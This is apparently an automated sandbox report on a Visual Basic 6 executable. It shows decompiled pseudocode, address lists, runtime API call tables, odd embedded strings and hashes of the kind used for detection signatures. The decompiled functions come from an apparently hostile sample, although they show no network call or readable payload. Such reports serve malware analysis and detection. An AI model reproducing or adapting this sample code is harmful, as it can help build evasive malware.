								_v240 = _t268;
								_v236 = 0x401160;
								_v252 = 0xa066336a;
								_t219 =  *_t268(0x4023f2, _t256, _t259, _t227, 0x10,  *[fs:0x0], 0x4012a6, _t232, _t232, _t262);
								L0040145C();
								_push(_v252);
								_push(L"Lindormen");
								L004013F6();
								L0040145C();
								_push(_v252);
								_push(L"Lindormen");
								L004013F6();
								L0040145C();
								_push(E0040BFE7);
								L00401462();
								return _t219;
							} else {
								_push(_t222);
								_push( &_v160);
								_push( &_v80);
								L00401426();
								_push( &_v80);
								L0040142C();
								L0040145C();
								L00401450();
								L16:
								_v220 = _v40;
								_t190 = _v220;
								_v240 = _t190;
								if(_v240 == 1) {
									L00401420();
									goto L26;
								} else {
									if(_v240 == 4) {
										_v228 = 1;
										_v224 = _v224 | 0xffffffff;
										_push(_v52);
										L0040141A();
										_v32 = _t190;
										while(_v32 >= _v228) {
											_v200 =  *_a20;
											_v208 = 8;
											_v72 = 1;
											_v80 = 2;
											_v152 =  &_v52;
											_v160 = 0x4008;
											_push( &_v80);
											_push(_v32);
											_push( &_v160);
											_push( &_v96);
											L00401438();
											_push( &_v96);
											_t204 =  &_v60;
											_push(_t204);
											L0040143E();
											_push(_t204);
											L00401444();
											_v104 = _t204;
											_v112 = 2;
											_push( &_v112);
											_push( &_v128);
											L0040140E();
											_push( &_v208);
											_push( &_v128);
											_t209 =  &_v144;
											_push(_t209);
											L00401414();
											_push(_t209);
											L0040142C();
											L0040145C();
											_t232 =  &_v60;
											L00401462();
											_push( &_v144);
											_push( &_v128);
											_push( &_v112);
											_push( &_v96);
											_push( &_v80);
											_push(5);
											L00401432();
											_t268 = _t268 + 0x18;
											_t216 = _v32 + _v224;
											if(_t216 < 0) {
												goto L30;
											} else {
												_v32 = _t216;
												continue;
											}
											goto L32;
										}
										_v88 = 0x80020004;
										_v96 = 0xa;
										_push(0x40b028);
										_t193 = _a20;
										_push( *_t193);
										L00401402();
										_v72 = _t193;
										_v80 = 8;
										_push(1);
										_push(1);
										_push( &_v96);
										_push( &_v80);
										L00401408();
										L0040145C();
										_push( &_v96);
										_t190 =  &_v80;
										_push(_t190);
										_push(2);
										L00401432();
										goto L26;
									} else {
										L26:
										_v48 = _v48 | 0x0000ffff;
										_push(_v28);
										E0040AF9C();
										_v212 = _t190;
										L0040146E();
										_t191 = _v212;
										_v36 = _t191;
										goto L28;
									}
								}
							}
						}
					} else {
						goto L27;
					}
				} else {
					L27:
					L00401420();
					_v48 = _v48 & 0x00000000;
					_push(_v28);
					E0040AF9C();
					_v212 = _t163;
					L0040146E();
					_t191 = _v212;
					_v36 = _t191;
					L28:
					_push(E0040BF32);
					L00401462();
					return _t191;
				}
				L32:
			}

0x0040bab4
0x0040bab4
0x0040bab4
0x0040bab4
0x0040bab4
0x0040bab5
0x0040bab7
0x0040baba
0x0040bac5
0x0040bac6
0x0040bac7
0x0040bad1
0x0040bad3
0x0040bad3
0x0040bad4
0x0040bad5
0x0040bad7
0x0040bad8
0x0040bad9
0x0040bada
0x0040badd
0x0040bae1
0x0040bae4
0x0040baee
0x0040baf0
0x0040baf1
0x0040baf3
0x0040baf6
0x0040baf9
0x0040bafa
0x0040bafa
0x0040bafb
0x0040bafc
0x0040bafe
0x0040bb04
0x0040bb06
0x0040bb09
0x0040bb0a
0x0040bb0f
0x0040bb10
0x0040bb13
0x0040bb15
0x0040bb1a
0x0040bb20
0x0040bb25
0x0040bb28
0x0040bb2b
0x0040bb30
0x0040bb36
0x0040bb3c
0x0040bb45
0x0040bb4c
0x0040bb50
0x0040bb5a
0x0040bb5b
0x0040bb60
0x0040bb6a
0x0040bb72
0x0040bb77
0x0040bb81
0x0040bb82
0x0040bb85
0x0040bb88
0x0040bb89
0x0040bb8e
0x0040bb92
0x0040bb93
0x0040bb98
0x0040bb9a
0x0040bb9d
0x0040bb9e
0x0040bba3
0x0040bba4
0x0040bba7
0x0040bbac
0x0040bbb2
0x0040bbb7
0x0040bbba
0x0040bbbd
0x0040bbc2
0x0040bbc8
0x0040bbc9
0x0040bbd4
0x0040bbda
0x0040bbdb
0x0040bbde
0x0040bbdf
0x0040bbe1
0x0040bbe6
0x0040bbed
0x0040bbf4
0x0040bbfb
0x0040bc05
0x0040bc0b
0x0040bc18
0x0040bc19
0x0040bc22
0x0040bc26
0x0040bc27
0x0040bc2f
0x0040bc30
0x0040bc33
0x0040bc34
0x0040bc39
0x0040bc3a
0x0040bc42
0x0040bc47
0x0040bc4e
0x0040bc51
0x0040bc59
0x0040bc5d
0x0040bc5e
0x0040bc60
0x0040bc65
0x0040bc71
0x0040bcc3
0x0040bcc9
0x0040bcd3
0x0040bcdc
0x0040bce0
0x0040bce1
0x0040bce9
0x0040bcea
0x0040bcf4
0x0040bcfc
0x00000000
0x0040bc73
0x0040bc76
0x0040bc7c
0x0040bc89
0x0040bc8c
0x0040bf5b
0x0040bf5b
0x0040bf71
0x0040bf7b
0x0040bf83
0x0040bf86
0x0040bf8d
0x0040bfa0
0x0040bfa6
0x0040bfab
0x0040bfae
0x0040bfb3
0x0040bfbd
0x0040bfc2
0x0040bfc5
0x0040bfca
0x0040bfd4
0x0040bfd9
0x0040bfe1
0x0040bfe6
0x0040bc92
0x0040bc92
0x0040bc99
0x0040bc9d
0x0040bc9e
0x0040bca6
0x0040bca7
0x0040bcb1
0x0040bcb9
0x0040bd01
0x0040bd04
0x0040bd0a
0x0040bd10
0x0040bd1d
0x0040bd33
0x00000000
0x0040bd1f
0x0040bd26
0x0040bd3d
0x0040bd47
0x0040bd4e
0x0040bd51
0x0040bd56
0x0040bd6d
0x0040bd81
0x0040bd87
0x0040bd91
0x0040bd98
0x0040bda2
0x0040bda8
0x0040bdb5
0x0040bdb6
0x0040bdbf
0x0040bdc3
0x0040bdc4
0x0040bdcc
0x0040bdcd
0x0040bdd0
0x0040bdd1
0x0040bdd6
0x0040bdd7
0x0040bddc
0x0040bde0
0x0040bdea
0x0040bdee
0x0040bdef
0x0040bdfa
0x0040bdfe
0x0040bdff
0x0040be05
0x0040be06
0x0040be0b
0x0040be0c
0x0040be16
0x0040be1b
0x0040be1e
0x0040be29
0x0040be2d
0x0040be31
0x0040be35
0x0040be39
0x0040be3a
0x0040be3c
0x0040be41
0x0040bd5e
0x0040bd64
0x00000000
0x0040bd6a
0x0040bd6a
0x00000000
0x0040bd6a
0x00000000
0x0040bd64
0x0040be49
0x0040be50
0x0040be57
0x0040be5c
0x0040be5f
0x0040be61
0x0040be66
0x0040be69
0x0040be70
0x0040be72
0x0040be77
0x0040be7b
0x0040be7c
0x0040be86
0x0040be8e
0x0040be8f
0x0040be92
0x0040be93
0x0040be95
0x00000000
0x0040bd28
0x0040be9d
0x0040be9d
0x0040bea2
0x0040bea5
0x0040beaa
0x0040beb0
0x0040beb5
0x0040bebb
0x00000000
0x0040bebb
0x0040bd26
0x0040bd1d
0x0040bc8c
0x0040bbef
0x00000000
0x0040bbef
0x0040bb47
0x0040bec0
0x0040bec8
0x0040becd
0x0040bed2
0x0040bed5
0x0040beda
0x0040bee0
0x0040bee5
0x0040beeb
0x0040beee
0x0040beee
0x0040bf2c
0x0040bf31
0x0040bf31
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040BAD2
__vbaStrToAnsi.MSVBVM60(?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BB0A
__vbaSetSystemError.MSVBVM60(?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BB20
__vbaStrToUnicode.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BB2B
__vbaFreeStr.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?,?,?,?,?,004012A6), ref: 0040BB3C
#606.MSVBVM60(00000400,00000002), ref: 0040BB60
__vbaStrMove.MSVBVM60(00000400,00000002), ref: 0040BB6A
__vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0040BB72
__vbaStrToAnsi.MSVBVM60(?,004012A6,00000400,00000400,00000002), ref: 0040BB89
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BB9E
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BBB2
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BBBD
__vbaStrToUnicode.MSVBVM60(004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6,00000400,00000400,00000002), ref: 0040BBC9
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,004012A6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004012A6), ref: 0040BBE1
__vbaStrCopy.MSVBVM60(004012A6,00000000,?,00000000,?,004012A6,00000000,0002003F,?), ref: 0040BEC8
__vbaSetSystemError.MSVBVM60(?), ref: 0040BEE0
__vbaFreeStr.MSVBVM60(0040BF32,?), ref: 0040BF2C

Strings

Lindormen, xrefs: 0040BFAE, 0040BFC5

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
String ID: Lindormen
API String ID: 3225542645-1899767452
Opcode ID: c0529d040c9cb4c7b18a0d286254eb9cb75a890a66b85bfb08aec200531d0171
Instruction ID: 220a1f05f23f31ed1391866520481f1bd12da86dcfc3e833a560d72b16c983cd
Opcode Fuzzy Hash: c0529d040c9cb4c7b18a0d286254eb9cb75a890a66b85bfb08aec200531d0171
Instruction Fuzzy Hash: F2E1C771D00219ABDB11EFE1C845FDEBBB8EF04308F10856AF115B71A2DB789A458F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E562, Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040E562(void* __ebx, void* __edi, void* __esi, char* _a4, void* _a8, void* _a24, void* _a52) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v56;
				intOrPtr _v60;
				void* _v76;
				char _v88;
				char _v104;
				char* _v128;
				char _v136;
				char* _v160;
				intOrPtr _v168;
				intOrPtr _v192;
				intOrPtr _v200;
				char _v220;
				void* _v224;
				signed int _v228;
				intOrPtr* _v240;
				signed int _v244;
				short _t63;
				short _t64;
				char* _t69;
				signed int _t73;
				void* _t101;
				void* _t103;
				intOrPtr _t104;

				_t104 = _t103 - 0xc;
				 *[fs:0x0] = _t104;
				L004012A0();
				_v16 = _t104;
				_v12 = 0x401220;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t101);
				L004013E4();
				L004013E4();
				L004013E4();
				_push( &_v104);
				L00401372();
				_v128 = L"supraspinate";
				_v136 = 0x8008;
				_push( &_v104);
				_t63 =  &_v136;
				_push(_t63);
				L00401378();
				_v224 = _t63;
				L00401450();
				_t64 = _v224;
				if(_t64 != 0) {
					_v128 = _a4;
					_v136 = 9;
					_v160 = L"dreas";
					_v168 = 8;
					if( *0x410010 != 0) {
						_v240 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v240 = 0x410010;
					}
					_t69 =  &_v88;
					L004013CC();
					_v224 = _t69;
					_t73 =  *((intOrPtr*)( *_v224 + 0x60))(_v224,  &_v220, _t69,  *((intOrPtr*)( *((intOrPtr*)( *_v240)) + 0x318))( *_v240));
					asm("fclex");
					_v228 = _t73;
					if(_v228 >= 0) {
						_v244 = _v244 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40b0b8);
						_push(_v224);
						_push(_v228);
						L004013D8();
						_v244 = _t73;
					}
					_v192 = _v220;
					_v200 = 3;
					_push(0x10);
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t64 = 0x10;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"JmVo9kBNN3193");
					_push(_v60);
					L0040136C();
					L004013D2();
				}
				asm("wait");
				_push(E0040E788);
				L00401450();
				L00401450();
				L004013D2();
				L00401450();
				return _t64;
			}

0x0040e565
0x0040e574
0x0040e580
0x0040e588
0x0040e58b
0x0040e592
0x0040e5a1
0x0040e5aa
0x0040e5b5
0x0040e5c0
0x0040e5c8
0x0040e5c9
0x0040e5ce
0x0040e5d5
0x0040e5e2
0x0040e5e3
0x0040e5e9
0x0040e5ea
0x0040e5ef
0x0040e5f9
0x0040e5fe
0x0040e607
0x0040e610
0x0040e613
0x0040e61d
0x0040e627
0x0040e638
0x0040e655
0x0040e63a
0x0040e63a
0x0040e63f
0x0040e644
0x0040e649
0x0040e649
0x0040e679
0x0040e67d
0x0040e682
0x0040e69d
0x0040e6a0
0x0040e6a2
0x0040e6af
0x0040e6d1
0x0040e6b1
0x0040e6b1
0x0040e6b3
0x0040e6b8
0x0040e6be
0x0040e6c4
0x0040e6c9
0x0040e6c9
0x0040e6de
0x0040e6e4
0x0040e6ee
0x0040e6f1
0x0040e6fe
0x0040e6ff
0x0040e700
0x0040e701
0x0040e702
0x0040e705
0x0040e712
0x0040e713
0x0040e714
0x0040e715
0x0040e718
0x0040e719
0x0040e726
0x0040e727
0x0040e728
0x0040e729
0x0040e72a
0x0040e72c
0x0040e731
0x0040e734
0x0040e73f
0x0040e73f
0x0040e744
0x0040e745
0x0040e76a
0x0040e772
0x0040e77a
0x0040e782
0x0040e787

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E580
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E5AA
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E5B5
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E5C0
#670.MSVBVM60(?,?,?,?,?,004012A6), ref: 0040E5C9
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0040E5EA
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0040E5F9
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,?,?,?,?,?,00008008,?), ref: 0040E644
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E67D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000060), ref: 0040E6C4
__vbaChkstk.MSVBVM60(00000000,?,0040B0B8,00000060), ref: 0040E6F1
__vbaChkstk.MSVBVM60(00000000,?,0040B0B8,00000060), ref: 0040E705
__vbaChkstk.MSVBVM60(00000000,?,0040B0B8,00000060), ref: 0040E719
__vbaLateMemCall.MSVBVM60(?,JmVo9kBNN3193,00000003), ref: 0040E734
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040E73F
__vbaFreeVar.MSVBVM60(0040E788,00008008,?), ref: 0040E76A
__vbaFreeVar.MSVBVM60(0040E788,00008008,?), ref: 0040E772
__vbaFreeObj.MSVBVM60(0040E788,00008008,?), ref: 0040E77A
__vbaFreeVar.MSVBVM60(0040E788,00008008,?), ref: 0040E782

Strings

supraspinate, xrefs: 0040E5CE
JmVo9kBNN3193, xrefs: 0040E72C
dreas, xrefs: 0040E61D

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$#670CallCheckHresultLateNew2
String ID: JmVo9kBNN3193$dreas$supraspinate
API String ID: 1440615753-929289072
Opcode ID: d6542e9431b5a1080d520f4ad474ef623afd13ce2c13aeae876e2b9e629fa9fc
Instruction ID: 2fde8e9deb5491e516701f7e88360bec4ab34d00b485217c4d6de71f0447cfba
Opcode Fuzzy Hash: d6542e9431b5a1080d520f4ad474ef623afd13ce2c13aeae876e2b9e629fa9fc
Instruction Fuzzy Hash: D2511970900219DFDB20EF91D845BCDB7B5BF08708F5084AAF409BB2A1DBB95A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E88E, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E88E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v108;
				void* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				char* _t73;
				char* _t74;
				char* _t78;
				signed int _t82;
				char* _t88;
				signed int _t92;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t119 = _t118 - 0xc;
				 *[fs:0x0] = _t119;
				L004012A0();
				_v16 = _t119;
				_v12 = 0x401240;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
				_push(0xb);
				_push(0xb);
				_push(0x7db);
				_push( &_v56);
				L00401354();
				_t73 =  &_v56;
				_push(_t73);
				L0040135A();
				_v112 =  ~(0 | _t73 != 0x0000ffff);
				L00401450();
				_t74 = _v112;
				if(_t74 != 0) {
					if( *0x410010 != 0) {
						_v140 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v140 = 0x410010;
					}
					_t78 =  &_v32;
					L004013CC();
					_v112 = _t78;
					_t82 =  *((intOrPtr*)( *_v112 + 0x120))(_v112,  &_v36, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x314))( *_v140));
					asm("fclex");
					_v116 = _t82;
					if(_v116 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x40b0b8);
						_push(_v112);
						_push(_v116);
						L004013D8();
						_v144 = _t82;
					}
					_v136 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v136;
					_v56 = 9;
					if( *0x410010 != 0) {
						_v148 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v148 = 0x410010;
					}
					_t88 =  &_v40;
					L004013CC();
					_v120 = _t88;
					_t92 =  *((intOrPtr*)( *_v120 + 0x60))(_v120,  &_v108, _t88,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x300))( *_v148));
					asm("fclex");
					_v124 = _t92;
					if(_v124 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40b0a8);
						_push(_v120);
						_push(_v124);
						L004013D8();
						_v152 = _t92;
					}
					_v80 = _v108;
					_v88 = 3;
					_push(0x10);
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"IpXl81");
					_push(_v28);
					L0040136C();
					_push( &_v40);
					_t74 =  &_v32;
					_push(_t74);
					_push(2);
					L004013C6();
					L00401450();
				}
				_push(E0040EAD9);
				L004013D2();
				return _t74;
			}

0x0040e891
0x0040e8a0
0x0040e8ac
0x0040e8b4
0x0040e8b7
0x0040e8be
0x0040e8cd
0x0040e8d0
0x0040e8d2
0x0040e8d4
0x0040e8dc
0x0040e8dd
0x0040e8e2
0x0040e8e5
0x0040e8e6
0x0040e8f6
0x0040e8fd
0x0040e902
0x0040e908
0x0040e915
0x0040e932
0x0040e917
0x0040e917
0x0040e91c
0x0040e921
0x0040e926
0x0040e926
0x0040e956
0x0040e95a
0x0040e95f
0x0040e96e
0x0040e974
0x0040e976
0x0040e97d
0x0040e99c
0x0040e97f
0x0040e97f
0x0040e984
0x0040e989
0x0040e98c
0x0040e98f
0x0040e994
0x0040e994
0x0040e9a6
0x0040e9ac
0x0040e9b6
0x0040e9b9
0x0040e9c7
0x0040e9e4
0x0040e9c9
0x0040e9c9
0x0040e9ce
0x0040e9d3
0x0040e9d8
0x0040e9d8
0x0040ea08
0x0040ea0c
0x0040ea11
0x0040ea20
0x0040ea23
0x0040ea25
0x0040ea2c
0x0040ea48
0x0040ea2e
0x0040ea2e
0x0040ea30
0x0040ea35
0x0040ea38
0x0040ea3b
0x0040ea40
0x0040ea40
0x0040ea52
0x0040ea55
0x0040ea5c
0x0040ea5f
0x0040ea69
0x0040ea6a
0x0040ea6b
0x0040ea6c
0x0040ea6d
0x0040ea70
0x0040ea7a
0x0040ea7b
0x0040ea7c
0x0040ea7d
0x0040ea7e
0x0040ea80
0x0040ea85
0x0040ea88
0x0040ea93
0x0040ea94
0x0040ea97
0x0040ea98
0x0040ea9a
0x0040eaa5
0x0040eaa5
0x0040eaaa
0x0040ead3
0x0040ead8

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E8AC
#538.MSVBVM60(?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8DD
#557.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8E6
__vbaFreeVar.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E8FD
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E921
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E95A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,00000120), ref: 0040E98F
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040E9D3
__vbaObjSet.MSVBVM60(0000000B,00000000), ref: 0040EA0C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,00000060), ref: 0040EA3B
__vbaChkstk.MSVBVM60(00000000,?,0040B0A8,00000060), ref: 0040EA5F
__vbaChkstk.MSVBVM60(00000000,?,0040B0A8,00000060), ref: 0040EA70
__vbaLateMemCall.MSVBVM60(?,IpXl81,00000002), ref: 0040EA88
__vbaFreeObjList.MSVBVM60(00000002,?,0000000B), ref: 0040EA9A
__vbaFreeVar.MSVBVM60 ref: 0040EAA5
__vbaFreeObj.MSVBVM60(0040EAD9,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EAD3

Strings

IpXl81, xrefs: 0040EA80

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckHresultNew2$#538#557CallLateList
String ID: IpXl81
API String ID: 2856081814-1769124608
Opcode ID: c316ab7d3dd3b302ae30050822be385d038e306d0a932a0c4a7100238bfd27e2
Instruction ID: a61bbf60e54a9fc15a25b1bc4b09a2c73eb77bc3b858938d6f51b63e4f8c316f
Opcode Fuzzy Hash: c316ab7d3dd3b302ae30050822be385d038e306d0a932a0c4a7100238bfd27e2
Instruction Fuzzy Hash: 3E513B74E002089FDB10DFA5C846BDEBBB4BF08704F10446AF509BB2A1D7B969959F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC66, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0040EC66(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				signed int _v36;
				char _v40;
				long long _v48;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				void* _v252;
				signed int _v256;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				signed int _t74;
				char* _t78;
				char* _t82;
				signed int _t86;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t119 = _t118 - 0xc;
				 *[fs:0x0] = _t119;
				L004012A0();
				_v16 = _t119;
				_v12 = 0x401268;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
				_v48 =  *0x401260;
				_v56 = 5;
				_t74 =  &_v56;
				_push(_t74);
				L00401348();
				L0040145C();
				_push(_t74);
				_push(L"Double");
				L00401360();
				asm("sbb eax, eax");
				_v252 =  ~( ~( ~_t74));
				L00401462();
				L00401450();
				_t78 = _v252;
				if(_t78 != 0) {
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					if( *0x410010 != 0) {
						_v272 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v272 = 0x410010;
					}
					_t82 =  &_v40;
					L004013CC();
					_v252 = _t82;
					_t86 =  *((intOrPtr*)( *_v252 + 0x50))(_v252,  &_v36, _t82,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x2fc))( *_v272));
					asm("fclex");
					_v256 = _t86;
					if(_v256 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40b0a8);
						_push(_v252);
						_push(_v256);
						L004013D8();
						_v276 = _t86;
					}
					_v268 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v268;
					_v56 = 8;
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					L00401342();
					L0040145C();
					L004013D2();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t78 =  &_v56;
					_push(_t78);
					_push(7);
					L00401432();
				}
				asm("wait");
				_push(E0040EED5);
				L00401462();
				return _t78;
			}

0x0040ec69
0x0040ec78
0x0040ec84
0x0040ec8c
0x0040ec8f
0x0040ec96
0x0040eca5
0x0040ecae
0x0040ecb1
0x0040ecb8
0x0040ecbb
0x0040ecbc
0x0040ecc6
0x0040eccb
0x0040eccc
0x0040ecd1
0x0040ecd8
0x0040ecde
0x0040ece8
0x0040ecf0
0x0040ecf5
0x0040ecfe
0x0040ed04
0x0040ed0e
0x0040ed18
0x0040ed1f
0x0040ed29
0x0040ed30
0x0040ed37
0x0040ed3e
0x0040ed45
0x0040ed4c
0x0040ed53
0x0040ed5a
0x0040ed68
0x0040ed85
0x0040ed6a
0x0040ed6a
0x0040ed6f
0x0040ed74
0x0040ed79
0x0040ed79
0x0040eda9
0x0040edad
0x0040edb2
0x0040edca
0x0040edcd
0x0040edcf
0x0040eddc
0x0040edfe
0x0040edde
0x0040edde
0x0040ede0
0x0040ede5
0x0040edeb
0x0040edf1
0x0040edf6
0x0040edf6
0x0040ee08
0x0040ee0e
0x0040ee18
0x0040ee1b
0x0040ee28
0x0040ee2f
0x0040ee33
0x0040ee37
0x0040ee3b
0x0040ee3f
0x0040ee43
0x0040ee44
0x0040ee4e
0x0040ee56
0x0040ee61
0x0040ee68
0x0040ee6c
0x0040ee70
0x0040ee74
0x0040ee78
0x0040ee79
0x0040ee7c
0x0040ee7d
0x0040ee7f
0x0040ee84
0x0040ee87
0x0040ee88
0x0040eecf
0x0040eed4

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EC84
#591.MSVBVM60(00000005), ref: 0040ECBC
__vbaStrMove.MSVBVM60(00000005), ref: 0040ECC6
__vbaStrCmp.MSVBVM60(Double,00000000,00000005), ref: 0040ECD1
__vbaFreeStr.MSVBVM60(Double,00000000,00000005), ref: 0040ECE8
__vbaFreeVar.MSVBVM60(Double,00000000,00000005), ref: 0040ECF0
__vbaNew2.MSVBVM60(0040A4C4,00410010), ref: 0040ED74
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040EDAD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0A8,00000050), ref: 0040EDF1
#596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE44
__vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE4E
__vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE56
__vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EE7F
